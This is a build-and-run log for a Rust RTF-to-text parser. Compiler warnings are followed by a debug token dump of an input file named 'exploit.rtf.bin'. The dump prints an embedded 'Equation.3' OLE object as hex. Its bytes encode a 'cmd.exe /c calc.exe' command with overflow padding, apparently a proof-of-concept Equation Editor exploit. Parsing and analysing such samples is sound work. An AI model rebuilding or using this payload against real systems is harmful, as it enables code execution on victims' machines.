warning: use of deprecated constant `std::sync::ONCE_INIT`: the `new` function is now preferred
  --> src\main.rs:18:15
   |
18 |     let app = app_from_crate!("")
   |               ^^^^^^^^^^^^^^^^^^^
   |
   = note: `#[warn(deprecated)]` on by default
   = note: this warning originates in the macro `crate_authors` (in Nightly builds, run with -Z macro-backtrace for more info)

warning: use of deprecated constant `std::sync::ONCE_INIT`: the `new` function is now preferred
  --> src\main.rs:18:15
   |
18 |     let app = app_from_crate!("")
   |               ^^^^^^^^^^^^^^^^^^^
   |
   = note: this warning originates in the macro `crate_authors` (in Nightly builds, run with -Z macro-backtrace for more info)

warning: trait objects without an explicit `dyn` are deprecated
  --> src\error.rs:50:23
   |
50 |     inner: Option<Box<std::error::Error>>,
   |                       ^^^^^^^^^^^^^^^^^
   |
   = note: `#[warn(bare_trait_objects)]` on by default
   = warning: this is accepted in the current edition (Rust 2018) but is a hard error in Rust 2021!
   = note: for more information, see <https://doc.rust-lang.org/nightly/edition-guide/rust-2021/warnings-promoted-to-error.html>
help: use `dyn`
   |
50 -     inner: Option<Box<std::error::Error>>,
50 +     inner: Option<Box<dyn std::error::Error>>,
   | 

warning: trait objects without an explicit `dyn` are deprecated
  --> src\main.rs:67:79
   |
67 | fn make_input_reader(infile: Option<&str>) -> error::Result<io::BufReader<Box<io::Read>>> {
   |                                                                               ^^^^^^^^
   |
   = warning: this is accepted in the current edition (Rust 2018) but is a hard error in Rust 2021!
   = note: for more information, see <https://doc.rust-lang.org/nightly/edition-guide/rust-2021/warnings-promoted-to-error.html>
help: use `dyn`
   |
67 - fn make_input_reader(infile: Option<&str>) -> error::Result<io::BufReader<Box<io::Read>>> {
67 + fn make_input_reader(infile: Option<&str>) -> error::Result<io::BufReader<Box<dyn io::Read>>> {
   | 

warning: trait objects without an explicit `dyn` are deprecated
  --> src\main.rs:86:81
   |
86 | fn make_output_writer(outfile: Option<&str>) -> error::Result<io::BufWriter<Box<io::Write>>> {
   |                                                                                 ^^^^^^^^^
   |
   = warning: this is accepted in the current edition (Rust 2018) but is a hard error in Rust 2021!
   = note: for more information, see <https://doc.rust-lang.org/nightly/edition-guide/rust-2021/warnings-promoted-to-error.html>
help: use `dyn`
   |
86 - fn make_output_writer(outfile: Option<&str>) -> error::Result<io::BufWriter<Box<io::Write>>> {
86 + fn make_output_writer(outfile: Option<&str>) -> error::Result<io::BufWriter<Box<dyn io::Write>>> {
   | 

warning: trait objects without an explicit `dyn` are deprecated
  --> src\error.rs:75:28
   |
75 |         source: Option<Box<std::error::Error>>,
   |                            ^^^^^^^^^^^^^^^^^
   |
   = warning: this is accepted in the current edition (Rust 2018) but is a hard error in Rust 2021!
   = note: for more information, see <https://doc.rust-lang.org/nightly/edition-guide/rust-2021/warnings-promoted-to-error.html>
help: use `dyn`
   |
75 -         source: Option<Box<std::error::Error>>,
75 +         source: Option<Box<dyn std::error::Error>>,
   | 

warning: trait objects without an explicit `dyn` are deprecated
  --> src\main.rs:78:28
   |
78 |                     as Box<io::Read>
   |                            ^^^^^^^^
   |
   = warning: this is accepted in the current edition (Rust 2018) but is a hard error in Rust 2021!
   = note: for more information, see <https://doc.rust-lang.org/nightly/edition-guide/rust-2021/warnings-promoted-to-error.html>
help: use `dyn`
   |
78 -                     as Box<io::Read>
78 +                     as Box<dyn io::Read>
   | 

warning: trait objects without an explicit `dyn` are deprecated
  --> src\main.rs:81:46
   |
81 |         None => Box::new(io::stdin()) as Box<io::Read>,
   |                                              ^^^^^^^^
   |
   = warning: this is accepted in the current edition (Rust 2018) but is a hard error in Rust 2021!
   = note: for more information, see <https://doc.rust-lang.org/nightly/edition-guide/rust-2021/warnings-promoted-to-error.html>
help: use `dyn`
   |
81 -         None => Box::new(io::stdin()) as Box<io::Read>,
81 +         None => Box::new(io::stdin()) as Box<dyn io::Read>,
   | 

warning: trait objects without an explicit `dyn` are deprecated
  --> src\main.rs:92:24
   |
92 |                 as Box<io::Write>
   |                        ^^^^^^^^^
   |
   = warning: this is accepted in the current edition (Rust 2018) but is a hard error in Rust 2021!
   = note: for more information, see <https://doc.rust-lang.org/nightly/edition-guide/rust-2021/warnings-promoted-to-error.html>
help: use `dyn`
   |
92 -                 as Box<io::Write>
92 +                 as Box<dyn io::Write>
   | 

warning: trait objects without an explicit `dyn` are deprecated
  --> src\main.rs:94:47
   |
94 |         None => Box::new(io::stdout()) as Box<io::Write>,
   |                                               ^^^^^^^^^
   |
   = warning: this is accepted in the current edition (Rust 2018) but is a hard error in Rust 2021!
   = note: for more information, see <https://doc.rust-lang.org/nightly/edition-guide/rust-2021/warnings-promoted-to-error.html>
help: use `dyn`
   |
94 -         None => Box::new(io::stdout()) as Box<io::Write>,
94 +         None => Box::new(io::stdout()) as Box<dyn io::Write>,
   | 

warning: cannot borrow `self.group_stack` as mutable because it is also borrowed as immutable
   --> src\rtftotext.rs:240:13
    |
239 |         if let Some(last_group) = self.get_last_group() {
    |                                   --------------------- immutable borrow occurs here
240 |             self.group_stack.push(last_group.clone());
    |             ^^^^^^^^^^^^^^^^^^^^^^------------------^
    |             |                     |
    |             |                     immutable borrow later used here
    |             mutable borrow occurs here
    |
    = note: `#[warn(mutable_borrow_reservation_conflict)]` on by default
    = warning: this borrowing pattern was not meant to be accepted, and may become a hard error in the future
    = note: for more information, see issue #59159 <https://github.com/rust-lang/rust/issues/59159>

warning: field is never read: `inner`
  --> src\error.rs:50:5
   |
50 |     inner: Option<Box<std::error::Error>>,
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
   |
   = note: `#[warn(dead_code)]` on by default
note: `Error` has a derived impl for the trait `Debug`, but this is intentionally ignored during dead code analysis
  --> src\error.rs:46:10
   |
46 | #[derive(Debug)]
   |          ^^^^^
   = note: this warning originates in the derive macro `Debug` (in Nightly builds, run with -Z macro-backtrace for more info)

warning: `rtf2text` (bin "rtf2text") generated 12 warnings
    Finished dev [unoptimized + debuginfo] target(s) in 0.03s
     Running `target\debug\rtf2text.exe -i exploit.rtf.bin`
[src\main.rs:113] &tokens = [
    Token::StartGroup,
    Token::ControlWord(rtf:1),
    Token::ControlWord(ansi),
    Token::ControlWord(ansicpg:1252),
    Token::ControlWord(deff:0),
    Token::ControlWord(nouicompat),
    Token::ControlWord(deflang:1033),
    Token::StartGroup,
    Token::ControlWord(fonttbl),
    Token::StartGroup,
    Token::ControlWord(f:0),
    Token::ControlWord(fnil),
    Token::ControlWord(fcharset:0),
    Token::Text( 43 61 6c 69 62 72 69 3b),
    Token::EndGroup,
    Token::EndGroup,
    Token::Newline,
    Token::StartGroup,
    Token::ControlSymbol(*),
    Token::ControlWord(generator),
    Token::Text( 52 69 63 68 65 64 32 30 20 36 2e 33 2e 39 36 30 30),
    Token::EndGroup,
    Token::ControlWord(viewkind:4),
    Token::ControlWord(uc:1),
    Token::Newline,
    Token::ControlWord(pard),
    Token::ControlWord(sa:200),
    Token::ControlWord(sl:276),
    Token::ControlWord(slmult:1),
    Token::ControlWord(f:0),
    Token::ControlWord(fs:22),
    Token::ControlWord(lang:9),
    Token::StartGroup,
    Token::ControlWord(object),
    Token::ControlWord(objemb),
    Token::ControlWord(objupdate),
    Token::StartGroup,
    Token::ControlSymbol(*),
    Token::ControlWord(objclass),
    Token::Text( 45 71 75 61 74 69 6f 6e 2e 33),
    Token::EndGroup,
    Token::ControlWord(objw:380),
    Token::ControlWord(objh:260),
    Token::StartGroup,
    Token::ControlSymbol(*),
    Token::ControlWord(objdata),
    Token::Text( 30 31 30 35 30 30 30 30 30 32 30 30 30 30 30 30 30 62 30 30 30 30 30 30 34 35 37 31 37 35 36 31 37 34 36 39 36 66 36 65 32 65 33 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 63 30 30 30 30 64 30 63 66 31 31 65 30 61 31 62 31 31 61 65 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 65 30 30 30 33 30 30 66 65 66 66 30 39 30 30 30 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 32 30 30 30 30 30 30 30 31 30 30 30 30 30 30 66 65 66 66 66 66 66 66 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 64 66 66 66 66 66 66 30 34 30 30 30 30 30 30 66 65 66 66 66 66 66 66 66 65 66 66 66 66 66 66 66 65 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 35 32 30 30 36 66 30 30 36 66 30 30 37 34 30 30 32 30 30 30 34 35 30 30 36 65 30 30 37 34 30 30 37 32 30 30 37 39 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 36 30 30 30 35 30 30 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 30 32 30 30 30 30 30 30 30 32 63 65 30 32 30 30 30 30 30 30 30 30 30 30 63 30 30 30 30 30 30 30 30 30 30 30 30 30 34 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 32 30 63 65 61 35 36 31 33 63 64 33 30 31 30 33 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 34 66 30 30 36 63 30 30 36 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 61 30 30 30 32 30 31 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 34 33 30 30 36 66 30 30 36 64 30 30 37 30 30 30 34 66 30 30 36 32 30 30 36 61 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 32 30 30 30 32 30 31 30 31 30 30 30 30 30 30 30 33 30 30 30 30 30 30 66 66 66 66 66 66 66 66 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 36 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 30 30 34 66 30 30 36 32 30 30 36 61 30 30 34 39 30 30 36 65 30 30 36 36 30 30 36 66 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 32 30 30 30 32 30 31 66 66 66 66 66 66 66 66 30 34 30 30 30 30 30 30 66 66 66 66 66 66 66 66 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 30 30 30 30 30 30 30 36 30 30 30 30 30 30 30 30 30 30 30 30 30 30 66 65 66 66 66 66 66 66 30 32 30 30 30 30 30 30 66 65 66 66 66 66 66 66 66 65 66 66 66 66 66 66 30 35 30 30 30 30 30 30 30 36 30 30 30 30 30 30 30 37 30 30 30 30 30 30 66 65 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 30 31 30 30 30 30 30 32 30 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 66 65 66 66 30 33 30 61 30 30 30 30 66 66 66 66 66 66 66 66 30 32 63 65 30 32 30 30 30 30 30 30 30 30 30 30 63 30 30 30 30 30 30 30 30 30 30 30 30 30 34 36 31 37 30 30 30 30 30 30 34 64 36 39 36 33 37 32 36 66 37 33 36 66 36 36 37 34 32 30 34 35 37 31 37 35 36 31 37 34 36 39 36 66 36 65 32 30 33 33 32 65 33 30 30 30 30 63 30 30 30 30 30 30 34 34 35 33 32 30 34 35 37 31 37 35 36 31 37 34 36 39 36 66 36 65 30 30 30 62 30 30 30 30 30 30 34 35 37 31 37 35 36 31 37 34 36 39 36 66 36 65 32 65 33 33 30 30 66 34 33 39 62 32 37 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 63 30 30 30 30 30 30 30 32 30 30 39 65 63 34 61 39 30 30 30 30 30 30 30 30 30 30 30 30 30 30 63 38 61 37 35 63 30 30 63 34 65 65 35 62 30 30 30 30 30 30 30 30 30 30 30 33 30 31 30 31 30 33 30 61 30 61 30 31 30 38 35 61 35 61 36 33 36 64 36 34 32 65 36 35 37 38 36 35 32 30 32 66 36 33 32 30 36 33 36 31 36 63 36 33 32 65 36 35 37 38 36 35 32 30 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 31 32 30 63 34 33 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 35 30 30 37 31 30 30 37 35 30 30 36 31 30 30 37 34 30 30 36 39 30 30 36 66 30 30 36 65 30 30 32 30 30 30 34 65 30 30 36 31 30 30 37 34 30 30 36 39 30 30 37 36 30 30 36 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 32 30 30 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 63 35 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 30 30 30 